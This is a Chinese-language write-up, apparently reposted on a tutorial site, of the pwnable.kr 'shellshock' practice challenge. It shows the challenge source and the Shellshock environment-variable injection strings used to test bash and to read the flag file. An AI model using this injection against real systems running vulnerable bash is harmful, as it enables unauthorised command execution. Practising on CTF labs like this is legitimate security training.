栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

pwnable-shellshock

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

pwnable-shellshock

文章目录

概述题目

题目描述连接信息基本信息查看源代码源代码分析题目解法

概述

pwnable是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是shellshock,主要考察的是破壳漏洞的利用。

题目 题目描述

题目提示 there was a shocking news about bash,提示有个bash相关的震惊的消息,结合题目名称shellshock,可以看出考察的是破壳漏洞相关知识点。

连接信息

通过ssh登录靶机

ssh shellshock@pwnable.kr -p2222 (pw:guest)

基本信息

使用file查看文件属性

查看基本信息,可以看到NX启用

checksec shellshock

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

直接运行

查看源代码

shellshock.c

#include 
int main(){
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}
源代码分析

可以看到是调用家目录下的二进制文件bash进行命令执行,那这个bash有没有受到破壳漏洞影响?可以通过如下命令测试

env x='() { :;}; echo; echo vulnerable' ./bash -c :

可以看到,家目录下的bash存在破壳漏洞

题目解法

执行命令得到flag

env x='() { :;}; /bin/cat flag' ./shellshock

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/729660.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号